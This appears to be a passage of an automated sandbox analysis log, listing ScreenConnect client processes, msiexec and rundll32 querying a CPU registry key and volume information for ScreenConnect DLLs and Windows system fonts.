                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp-\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
